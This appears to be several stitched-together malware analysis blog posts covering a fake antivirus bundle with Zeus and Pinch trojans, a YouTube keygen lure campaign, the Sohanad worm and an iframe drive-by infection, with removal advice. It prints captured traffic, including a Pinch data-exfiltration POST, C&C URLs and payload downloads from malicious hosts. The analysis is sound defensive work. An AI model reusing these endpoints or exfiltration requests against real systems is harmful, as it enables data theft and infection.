We can also see all the text that is used in the false security warnings started by this rogue. The user agent that the malware will use to query the malicious website downloadavr25(dot)com is “wget 3.0″ and if we try to query the website with a different user agent, then the website should deny our query.

An interesting thing is that we can see also references to registry keys and files that are not related to Internet Security 2010 but are related to other rogue security software:

1
2
3

Software\AVR
Software\RealAV
Software\AntivirusXP

We have noticed also a very interesting data inside the unpacked executable that looks like a obfuscaped javascript code:

The content of the above ofuscated javascript code is copied by the malware in the file warning.html that is placed in the system32 folder.

When the main loader is executed, it creates the following files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

C:\DOCUME~1\user\LOCALS~1\Temp\teste1_p.exe
C:\DOCUME~1\user\LOCALS~1\Temp\q1.exe
C:\DOCUME~1\user\LOCALS~1\Temp\avto.exe
C:\DOCUME~1\user\LOCALS~1\Temp\6_ldry3.exe
C:\DOCUME~1\user\LOCALS~1\Temp\5_odbn0.exe
C:\DOCUME~1\user\LOCALS~1\Temp\4_pinnew.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2_load.exe
C:\DOCUME~1\user\LOCALS~1\Temp\0_11adwara.exe
C:\WINDOWS\system32\sdra64.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca0.exe
C:\WINDOWS\system32\lowsec
C:\WINDOWS\system32\lowsec\local.ds
C:\WINDOWS\system32\lowsec\user.ds
C:\WINDOWS\system32\smss32.exe
C:\WINDOWS\system32\winlogon32.exe
C:\WINDOWS\svc.exe
C:\WINDOWS\odbn0.exe
C:\WINDOWS\system32\helper32.dll
C:\WINDOWS\system32\IS15.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca2.exe
C:\WINDOWS\system32\41.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca1.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25caa.exe
C:\WINDOWS\lsass.exe
C:\Program Files\InternetSecurity2010
C:\DOCUME~1\user\LOCALS~1\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
C:\Program Files\InternetSecurity2010\IS2010.exe
C:\DOCUME~1\user\Desktop\Internet Security 2010.lnk
C:\DOCUME~1\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Security 2010.lnk
C:\DOCUME~1\user\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Security 2010.lnk
C:\WINDOWS\system32\18467.exe

Note that all the above files were created during a 24 hours time from the first run of the main loader. The loader adds most of the recently created executable files to the registry startup keys to make sure all the malicious files are started everytime Windows is booted.

We can see a screenshot of malicious running processes:

This is a screenshot of all created files:

From the files that have been created we can see that the loader installs a lot of malicious files, in particular we can see that it is installed the famous ZeuS Trojan (sdra64.exe), the rogue security software Internet Security 2010 (IS2010.exe), BHOs (helper32.dll), the famous Pinch Trojan (4_pinnew.exe) and other very dangerous kind of trojans in the Temp folder.

We have noticed also various ring3 API hooks installed by sdra64.exe and other executables that hide their presence in the system by making hidden the files from the regular explorer searches and from all the other file searches made by user-mode applications. The files are also hidden from the task manager since the process of Zeus sdra64.exe is hidden too.

The infected system is now esposed to a very high risk of sensitive data theft and of being used as fraudulent base to host malicious files or to launch attacks such as DDoS or malware spreading on famous P2P platforms like eMule and Torrents. In particular what make the computer at a very risk of data theft are the two famous trojans used mainly only to steal Bank Accounts, Credit Cards Details, Identity and to keystroke everything that is typed by the keyboard:

• Zeus Trojan
• Pinch Trojan

After the hidden execution of the rogue security software Internet Security 2010 the system started to become very unstable. Most executables that are generally used to analyze the system such as regedit.exe and taskmgr.exe could not be started:

A very simple and quick workaround fix to be able to run regedit.exe and taskmgr.exe is to copy the files under C:\ and rename them respectively:

1
2

C:\regedit.exe -> C:\r.exe
C:\taskmgr.exe -> C:\t.exe

Now it will be possible to inspect the registry with r.exe (regedit) and check running processes with t.exe (taskmgr). Also a lot of other files related to freeware and commercial applications of any gender, from security software to video conversion software, could not be started and when the user try to run a “blacklisted” process, the rogue software will start to show aggressive fake security warnings stating the file is infected.

From these images we can clearly see the rogue security software Internet Security 2010 in action during a fake system scan and when it display the fake security warnings stating the system is infected by a huge number of trojans (even if in this case is true LOL):

This is a part of the logged network traffic during the malware infection:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

GET /lightbox/js/r/files/tasks/AC HTTP/1.1
Host: sexzoznamka.eu
 
GET /lightbox/js/r/robo.php?r=1 HTTP/1.1
Host: sexzoznamka.eu
 
GET /cgi-bin/download.pl?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /dfghfghgfj.dll HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /loads.php?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /lightbox/js/r/robo.php?r=4 HTTP/1.1
Host: sexzoznamka.eu
 
GET /cgi-bin/get.pl?l=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: testavrdown.com
 
UDP:53 -> autouploaders.net
UDP:53 -> sruprekut.net
UDP:53 -> greatinstant.net
 
GET /mass/tds2.php HTTP/1.1
Host: autouploaders.net
 
GET /123.exe HTTP/1.1
Host: plugininput.com
 
GET /nop/tds2.php HTTP/1.1
Host: saloongins.net
 
GET /in.cgi?16 HTTP/1.1
Host: promotds.com
 
GET /pi.php HTTP/1.1
Host: kingsizematures.com
 
GET / HTTP/1.1
Host: interno-porn.com
 
GET /pi.php HTTP/1.1
Host: interno-porn.com
 
GET /lightbox/js/r/robo.php?r=5 HTTP/1.1
Host: sexzoznamka.eu
 
POST /gate/gate.php HTTP/1.0
Host: moretds.in
Content-Length: 1612
a=vaska_1@123mail.ru&b=pinch3_report&d=report.bin&c=xxx
 
GET /out.php?t=3.0.2.231&url=xxx=&s=3 HTTP/1.1
Host: interno-porn.com
 
GET / HTTP/1.1
Host: www.nasty-xx.net
 
GET /js2/33311.php?view=h HTTP/1.1
Host: pages.etology.com
 
GET /transformer/v4/ads2.js HTTP/1.1
Host: media.etology.com
 
GET /search.php?qq=xxx HTTP/1.1
Host: getgreatguide.in
 
GET /s/exx.php HTTP/1.1
Host: getgreatguide.in

From the above traffic we can see that the malware uses the domain

1
2

GET /lightbox/js/r/robo.php?r=1 HTTP/1.1
Host: sexzoznamka.eu

To launch commands, infact we can see that the number:

1

robo.php?r=1

Change based on the traffic received or sent, so we presume it change everytime a specific action has been terminated and by changing the number it will start a new action associated with the number.

We can see various domains used to spread the TDSS trojan:

1
2
3

GET /mass/tds2.php HTTP/1.1
GET /123.exe HTTP/1.1
GET /nop/tds2.php HTTP/1.1

And we can also see that a domain is used for receive the report that contains all the sensitive data stolen from the infected computer, the data is then sent to a specific email address:

1
2
3
4

POST /gate/gate.php HTTP/1.0
Host: moretds.in
Content-Length: 1612
a=vaska_1@123mail.ru&b=pinch3_report&d=report.bin&c=xxx

The above data can identify the traffic generated by the Pinch trojan.

We can also see the domain from which the malware has downloaded the files related to the rogue software Internet Security 2010:

1
2
3

GET /loads.php?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com

We have scanned the infected computer with Hijack Hunter and below there are all the malware traces extracted from the log file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71

[+] Running processes
 
C:\DOCUME~1\user\LOCALS~1\teste1_p.exe (354304 bytes) (Unknown) (f49588f405759025573272186038ffc5)
C:\DOCUME~1\user\LOCALS~1\q1.exe (293888 bytes) (Unknown) (811805ec29c6f3e0e479e0e8bad9dbff)
C:\WINDOWS\system32\smss32.exe (18944 bytes) (Unknown) (3aa2b2dbb73cebcb67f6e0ef2ce313d1)
C:\Program Files\InternetSecurity2010\IS2010.exe (1117184 bytes) (Internet Security) (d86468b427a31d2c6348256f7a1a03a7)
C:\DOCUME~1\user\LOCALS~1\5_odbn0.exe (295424 bytes) (Unknown) (c70ba51397f3ef815589cd4917699b15)
C:\Program Files\InternetSecurity2010\IS2010.exe (1117184 bytes) (Internet Security) (d86468b427a31d2c6348256f7a1a03a7)
 
[+] Registry startups
 
Value: smss32.exe
Data: C:\WINDOWS\system32\smss32.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: netc
Data: C:\WINDOWS\svc.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: odbny0
Data: C:\WINDOWS\odbn0.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: lsass
Data: C:\WINDOWS\lsass.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: Internet Security 2010
Data: C:\Program Files\InternetSecurity2010\IS2010.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: Userinit
Data: C:\WINDOWS\system32\winlogon32.exe,C:\WINDOWS\system32\sdra64.exe,
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
 
[+] Windows Firewall allowed programs
 
Value: C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe
Data: C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe:*:Enabled:Enabled
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
 
[+] Windows Hijacks
 
Value: DisableTaskMgr
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
 
Value: NoChangingWallpaper
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
 
Value: NoChangingWallpaper
Data: 1
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
 
[+] Executables in Temp folders
 
C:\DOCUME~1\user\LOCALS~1\0_11adwara.exe (18944 bytes) (Unknown) (3aa2b2dbb73cebcb67f6e0ef2ce313d1)
C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe (44032 bytes) (Unknown) (4b4440b36ec91d2ca8084735760109fd)
C:\DOCUME~1\user\LOCALS~1\5_odbn0.exe (295424 bytes) (Unknown) (c70ba51397f3ef815589cd4917699b15)
C:\DOCUME~1\user\LOCALS~1\60325cahp25caa.exe (2661888 bytes) (Unknown) (6411876d41f55fa21003afe9256b24d2)
C:\DOCUME~1\user\LOCALS~1\6_ldry3.exe (84992 bytes) (Unknown) (180ef4d8f204fdd201909f06ed174a8b)
C:\DOCUME~1\user\LOCALS~1\avto.exe (295936 bytes) (Unknown) (a66bbd3944586e428029533e3ce80d60)
C:\DOCUME~1\user\LOCALS~1\q1.exe (293888 bytes) (Unknown) (811805ec29c6f3e0e479e0e8bad9dbff)
C:\DOCUME~1\user\LOCALS~1\teste1_p.exe (354304 bytes) (Unknown) (f49588f405759025573272186038ffc5)
 
[+] TCP Connections
 
smss32.exe -> 127.0.0.1:1042 -> 193.104.153.30:80 -> CLOSE_WAIT
q1.exe -> 127.0.0.1:1050 -> 89.248.172.136:80 -> ESTABLISHED
q1.exe -> 127.0.0.1:1052 -> 89.248.168.69:80 -> ESTABLISHED

Steve has successfully unpacked the sample and this is his analysis:

Call to VirtualProtect to make the data in the first section writable/decryptable. For some reason it spaces pushing the parameters for the call inbetween other API calls.

Simple decryption loop and more pointless(?) API calls.

Call to a Call which calls the second decrypter stub.

Second stub, memory allocation and more decryption, nothing worth noting.

Now at the JMP to the decrypted third stub, which was allocated at 0xA00000. In the hex dump you can clearly see the string “Mystic Compressor”.

More memory allocation and yet more decryption, basically the same as before.

Now at 0xA10000, the forth and final stub.

Goes thru more decryption and finally lands on a RETN 4, which takes us to the OEP.

OEP of the packed file.

Conclusion:

Lack of anti debugging made this packer fairly easy to analyze. But, I have found 3 other samples on MDL in the last few days that were packed with it so it must be popular. One file I found was a packed version of MicroJoiner, which dropped 8 files which were also packed with Mystic.

From the unpacked files, we can extract very interesting data that can help us to statically know or understand for what can be used the single files from the malware.

Visit the following link to read the second part of this article where we conduct a static analysis of the malware, and explain how dangerous the effects of these infections can be: Welcome to the jungle: Zeus + Pinch + Rogues

Blackhat SEO strategy targeted most popular video streaming websites such as youtube, metacafe, etc. and the malicious files that are served to the users are not detected from most on-demand Antivirus scanners. We have noticed also that the malicious file is updated with a new malicious (and undetected) file every x days, or in some cases every x hours.

After a specific search using google.com of the malicious domains, we can see that if we search for links of the malicious websites on popular video streaming websites we have following numbers of pages:

• Query for safehostingsolutions(dot)com site:metacafe.com
• Query for qualityupload(dot)com site:metacafe.com
• Query for safehostingsolutions(dot)com site:youtube.com
• Query for qualityupload(dot)com site:youtube.com
• Query for fileaddiction(dot)com site:youtube.com
• Query for freedatatransfer(dot)com site:youtube.com

From the images above we can see the total links found on Google, related to Youtube and Metacafe only, are approximately 19,611 and we assume that the infected users overall can be approximately more than 50,000.

All the malicious links are contained in the description of the videos, but in some cases, we have noticed that they are also contained in the videos. In some videos its also described how to use specific (infected) applications, and that the user needs for example, to run the executable “Run as Administrator”, or that the file is completely clean from viruses (false), or that it needs to be allowed in the firewall to work properly (false) etc.

Using this kind of social enginnering, the malicious files can be completely installed in the system and can take full control of the computer very easily (especially if executed as Administrator or if added in the exclusion list of the local Antivirus/Firewall as described above).

In brief, it is like exploiting the human mind, telling users what they need to do and using this technique, if successful, can bypass every kind of security.

From the links present in the video streaming websites, we can see the targeted tags in the title of the fake videos are mostly related to the new Windows 7 and videogames:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

Windows 7 Keygen for 32 and 64 bit
Windows 7 Keygen for all Versions
How to: Get Windows 7 Ultimate for FREE.
How to Install and Activate Windows 7
Windows 7 Professional Keygen - 100% Working
Win7 Build 7264 & 7600 activation crack
Lockerz hack glitch
Windows 7 Professional Keygen - 100% Working
learn how to hack...very easy
Ultimate Psptube 2.0- Youtube on PSP Tutorial 5.00m33
Lockerz hack glitch
PSP Brick Recovery - low quality tutorial
FREE itunes Code Generator helps a lot!!
Habbo Hack - Credit Hack V1 - For Austraila - US
Xbox Live Generator- by CodeMaker400
how to Hack a Credit Card Number , VISA 2010

The infected websites that host the malicious files are the following:

1
2
3
4
5
6
7
8
9

hxxp://fileaddiction.com/ -> 213.5.64.20 (eu5.altushost.com)
hxxp://freedatatransfer.com/ -> 213.5.64.20 (eu5.altushost.com)
hxxp://qualityupload.com/ -> 213.5.64.20 (eu5.altushost.com)
hxxp://safehostingsolutions.com/ -> 213.5.64.20 (eu5.altushost.com)
hxxp://chronicdownload.com/ -> 213.5.64.20 (eu5.altushost.com)
hxxp://planetfileshare.com/ -> 213.5.64.20 (eu5.altushost.com)
hxxp://freedownloadthanks.com/ -> 213.5.64.20 (eu5.altushost.com)
hxxp://safetransferonline.com/ -> 213.5.64.20 (eu5.altushost.com)
hxxp://thefilebarn.co.cc/ -> 93.174.93.130 (hosting1.nl.santrex.net)

Note that all the users that click in the malicious links present in the description of the false videos are all redirected to the same page, download.html, that contains the false virus scan report and the download of the infected file.

Another method used by blackhat SEO, is to display to the user a fake virus scan report of the malicious file that show the file is completely clean and safe. When really, the file is infected.

In particular, the malicious websites have displayed a scan report, that has a similar look of our multi-engine antivirus scanner report, and users are also redirected to our website using following GET query:

1

GET /initial

After checking our web server logs, we have counted more than 9000 unique IP addresses that have requested the GET /initial page, and they could all be infected users:

The malicious file installs on the victim’s computer also a rogue security software named MS Antivirus (msa.exe) and a trojan that, from the traffic it generated, looks like to be an automatic ad clicker.

When the malicious file named UAV Generator.exe is executed, it creates the following files:

1
2
3
4
5
6
7
8
9

%User%\Local Settings\Temp\a.dat
%User%\Local Settings\Temp\a.exe
%User%\Local Settings\Temp\b.exe
%User%\Local Settings\Temp\c.exe
%User%\Local Settings\Temp\sshnas.dll
C:\WINDOWS\msa.exe
C:\WINDOWS\System32\sshnas.dll
%User%\Local Settings\Temp\c.exe
C:\WINDOWS\msa.exe

The file creates the following registry entries:

1
2
3
4
5
6
7
8
9
10

HKLM\SYSTEM\ControlSet001\Services\SSHNAS\Parameters\ServiceDll:
C:\WINDOWS\System32\sshnas.dll
HKLM\SYSTEM\CurrentControlSet\Services\SSHNAS\Parameters\ServiceDll:
C:\WINDOWS\System32\sshnas.dll
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NeoChronos:
%User%\Local Settings\Temp\c.exe
HKCU\Software\Astrocom
HKCU\Software\NeoChronos
HKCU\Software\XML
HKCU\Software\Microsoft\Handle

The file generates the following Internet traffic:

1
2
3
4
5
6
7

hxxp://t.invitemedia.com/track_imp?partnerID=77&campID=6242&crID=9715pubICode=519731
hxxp://myf2you.com/resolution.php
hxxp://thezasite.com/borders.php
hxxp://content.yieldmanager.com
hxxp://fgage.com/ad_type.php
hxxp://ad.scanmedios.com/st?ad_type=iframe&ad_size=300x250&section=216796
hxxp://ad.harrenmedianetwork.com/st?ad_type=iframe&ad_size=120x600&section=502887

The other infected files were detected by some Antiviruses as Mal/TDSSPack-U (Sophos) and Trojan.Win32.Alureon (Ikarus) that probably connects to a C&C Server and are used to install the famous ZeUs Trojan to steal credit card, bank accounts and other personal info from the victim’s computer.

As always, we highly recommend to NOT download and execute unknown executables, do not trust what you see in unknown websites, always double check the files before run them in your system and do same with the website address you do not know. Another recommendation is do not download files that contain keywords such as “crack”, “keygen”, “patch”, “cracked”, “100% working” as in 99,9% of cases contain stealth malware and/or rootkits of the TDSS family.

Remember, its always safer to buy software if you like it.

The worm can disable certain Windows functionalities and, in some cases, it can hijack the browser Internet Explorer homepage and other registry keys. The worm is also used for download other malware or other programs that can steal credit cards and personal information.

It is also able to spread itself not only by Yahoo Messengers but also by infecting removable devices such as USB flash and hard drives. The worm can copy itself on the removable device and using the file autorun.ini it can infect every computer where will be inserted the removable device and that have the Autorun option enabled.

The worm can performs these actions:

• Copy itself to system32 or windows folder
• Spread itself by sending spam messages on Y! Messenger Contacts
• Spread itself by infecting removable devices
• Disable important functionalities of Windows
• Download other malware
• Identity theft
• Credit Card and Bank accounts theft

The worm can drop itself in the system using these file names:

1
2
3
4
5
6
7
8
9
10
11

C:\WINDOWS\sclhosts.exe
C:\WINDOWS\scvhosts.exe
C:\WINDOWS\system32\blastclnnn.exe
C:\WINDOWS\system32\chrome.exe
C:\WINDOWS\system32\yahoooo.exe
C:\WINDOWS\system32\scvhost.exe
C:\WINDOWS\lsass.exe
C:\WINDOWS\chrome.exe
C:\WINDOWS\system32\chrome.exe
C:\WINDOWS\ffoxer.exe
C:\WINDOWS\foxr.exe

It installs the following registry key to ensure it starts up with Windows:

1

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Yahoo Messengger

In some cases the worm disabled also TaskManager and Regedit by changing these registry values:

1
2
3
4

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
DisableTaskMgr (1)
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
DisableRegistryTools (1)

The worm disabled the option to “Show hidden files” in Windows so it can stay hidden from explorer search:

1
2

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\
Hidden\ShowAll (0)

The worm disabled the option to execute a System Restore to roll back to a good situation by changing this registry values:

1
2
3
4

HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\
DisableSR (1)
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\
LimitSystemRestoreCheckpointing (1)

Other detections generated by other Antivirus are:

IM-Worm.Win32.Sohanad
IM-Worm.Win32.AutoIt.g
WORM_SOHANAD
W32.Imaut
W32/Sohana-AH

How to remove Worm.Win32.Sohanad ?

1) Kill malicious running processes associated with the worm
2) Delete malicious files
3) Delete malicious registry keys
4) Restore all the disabled functionalities of Windows
5) Check with your credit card company to see if your missing any money

You can use the following script to re-enable the functionalities of Windows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

Windows Registry Editor Version 5.00
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden]
"ShowAll"=dword:00000001
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
"DisableSR"=dword:00000000
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"LimitSystemRestoreCheckpointing"=dword:00000000

The script will perform these actions:

1) Enable Task manager
2) Enable Regedit
3) Enable SystemRestore
4) Enable Show Hidden Files option

Save the script as restore.reg and double click it.

You can also scan your system with NoVirusThanks Malware Remover to detect and remove other unwanted applications.

The website could be compromised by the hacker because:

- Your website contains scripts that are vulnerable to RFI/SQL/XSS/LFI/RCE/etc.

- Your website is hosted in a shared-host, and if an hacker has compromised one website hosted in the same cluster as yours, the hacker can infect ALL the websites present, yours included.

Now lets see what would happen if you had visited the infected website with the hidden malicious iframe. The malicious hidden iframe looks like:

After I browsed the malicious url I was redirected to another website that contains a PDF exploit:

Internet traffic:

1
2
3
4
5
6
7
8
9

GET /in.cgi?cocacola46 HTTP/1.1
Host: litetopfindworld.cn
HTTP/1.1 302 Found
 
GET /index.php?cocacola46 HTTP/1.1
Host: ghrgt.hostindianet.com
HTTP/1.1 200 OK
Server: nginx/0.6.35
Content-Length: 6147

From the exploit screenshot we can see that the exploit redirected my browser to:

cache/readme.pdf  => Another iframe redirect
cache/flash.swf     => Another iframe redirect

It created various files in Temporary Internet Files related to the malicious urls:

After the execution of the files downloaded from the exploit, new files were created in my system:

1
2
3
4
5

C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe

The file C:\Documents and Settings\user\user.exe had +H (Hidden) attribute and was hidden from explorer search. A DLL file named crypts.dll was injected in explorer.exe and the file named user.exe created a new registry key to be able to startup everytime Windows starts:

1

HKCU\...\Run\user.exe

During the analysis, the malware established various connections with different domains and IPs:

1
2
3
4
5
6

94.247.3.152 (hs.3-152.zlkon.lv)
213.155.4.82 (N/A)
78.109.30.224 (reverse30-224.reserver.ru)
94.247.2.95 (hs.2-95.zlkon.lv)
68.180.151.74 (hansali4.com)
83.133.127.5 (.)

Internet traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=xxx&rnd=xxx HTTP/1.1
Host: 213.155.4.82
 
POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Length: 16
guid=xxxxxx
 
GET /bt.php?mod=&id=xxx&up=xxx&mid=soboc42 HTTP/1.1
Host: af9f330a59.com
0SLP:3600;MOD:dAcbf6;URL:hxxp://hansali4.com/731l2.exe;SRV:stoped;
 
GET /731l2.exe HTTP/1.1
Host: hansali4.com
 
POST /gate/gate.php HTTP/1.0
Host: mixmediadirect.cn
 
194.8.74.51:443 => SSL Traffic

The malware also started to establish connections with hotmail.com, probably to spam messages to other emails or something similar:

1
2
3
4
5
6
7
8
9

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hotmail.com
Connection: Keep-Alive
 
HTTP/1.1 302 Redirected
Date: Sun, 29 Mar 2009 16:59:07 GMT
Server: Microsoft-IIS/6.0
Location: hxxp://lc1.bay0.hotmail.passport.com/cgi-bin/login

This is a report from the virus scanner:

Report Generated: 29.3.2009 at 19.57.41 (GMT 1)
File Name: index[1].htm
File Size: 6 KB
MD5 Hash: 2F9467513FAE3071B8EC831857963340
SHA1 Hash: 59C6D7D70F529762FAD7408360E016D6C816EFB3
Detection Rate: 2 on 24 (8,33 %)
Status: INFECTED

 

Antivirus Sig version Engine Version Result
a-squared 29/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.228 8.1.2.12 -
Avast 090328-0 4.8.1229 -
AVG 270.11.31/2028 8.0.0.0 -
BitDefender 29/03/2009 7.0.0.2555 -
ClamAV 29/03/2009 0.93.1.0 -
Comodo 1087 3.8 -
Dr.Web 29/03/2009 5.0 -
Ewido 29/03/2009 4.0.0.2 -
F-PROT 6 20090328 4.4.4.56 JS/Psyme.IX
G DATA 19.3655 2.0.7309.847 -
IkarusT3 27/03/2009 1001044 -
Kaspersky 29/03/2009 8.0.0.357 Trojan-Downloader.JS.Agent.duy
McAfee 29/03/2009 5.1.0.0 -
Malware Hash Registry 29/03/2009 N/A -
NOD32 v3 3972 3.0.677 -
Norman 2009/03/27 5.92.08 -
Panda 07/02/2009 9.5.1.00 -
QuickHeal 28 March, 2009 10.0 -
Solo Antivirus 29/03/2009 8.0 -
Sophos 29/03/2009 4.32.0 -
TrendMicro 927(592700) 1.1-1001 -
VBA32 29/03/2009 3.12.0.300 -
VirusBuster 10.102.26 1.4.3 -

Report Generated: 29.3.2009 at 19.56.42 (GMT 1)
File Name: 731l2[1].exe
File Size: 71 KB
MD5 Hash: 6E14662D9469DFC1E6387F9C5D00513A
SHA1 Hash: C0E8B584E105ACED2A4CE403EF77CB45B3987E45
Detection Rate: 17 on 24 (70,83 %)
Status: INFECTED

 

Antivirus Sig version Engine Version Result
a-squared 29/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.228 8.1.2.12 TR/Downloader.Gen
Avast 090328-0 4.8.1229 Win32:Trojan-gen {Other}
AVG 270.11.31/2028 8.0.0.0 Downloader.Generic8.ZVT
BitDefender 29/03/2009 7.0.0.2555 Trojan.Generic.1545891
ClamAV 29/03/2009 0.93.1.0 -
Comodo 1087 3.8 Backdoor.Win32.KeyStart.~A
Dr.Web 29/03/2009 5.0 Trojan.DownLoader.origin
Ewido 29/03/2009 4.0.0.2 -
F-PROT 6 20090328 4.4.4.56 -
G DATA 19.3655 2.0.7309.847 -
IkarusT3 27/03/2009 1001044 Backdoor.Win32.KeyStart
Kaspersky 29/03/2009 8.0.0.357 Backdoor.Win32.KeyStart.cb
McAfee 29/03/2009 5.1.0.0 Generic Downloader.x trojan
Malware Hash Registry 29/03/2009 N/A detect rate 74%
NOD32 v3 3972 3.0.677 Win32/TrojanDownloader.Agent.OWB
Norman 2009/03/27 5.92.08 Trojan W32/DLoader.KZPW
Panda 07/02/2009 9.5.1.00 -
QuickHeal 28 March, 2009 10.0 Backdoor.KeyStart.cb
Solo Antivirus 29/03/2009 8.0 Backdoor.Win32.KeyStart.CB
Sophos 29/03/2009 4.32.0 Sus/Spy-B
TrendMicro 927(592700) 1.1-1001 -
VBA32 29/03/2009 3.12.0.300 Backdoor.Win32.KeyStart.bz
VirusBuster 10.102.26 1.4.3 Backdoor.KeyStart.AD

What can I do if my website is infected ?

• Clean the infected HTML/PHP pages
• Change username and password to the FTP Account
• Change username and password to the Email Account
• Change username and password to the SSH
• Contact the server admin and explain your situation
• Check your PHP files for possible vulnerabilities
• Update all the installed software (blog, forum, etc)
• Remember to never make backups from the website to your PC
• Use always local backups for the website files

The first action that the system administrator needs to do is to remove the malicious hidden iframe code from all HTML pages, and then check the logs and code of installed PHP scripts to find the presence of possible vulnerable code. It is very important to change all the usernames and passwords for all the accounts present in the server.

How can I remove the malware infection from my computer ?

1] Delete all the created files, in my case:

1
2
3
4
5

C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe

2] Delete the malicious registry keys, in my case:

1

HKCU\...\Run\user.exe

3) Run a complete system scan with your Antivirus to detect other possible trojans installed in your computer.

4) Scan your system with NoVirusThanks Malware Remover.

Another very similar analysis to this:
Website with hidden iframe and Malware Analysis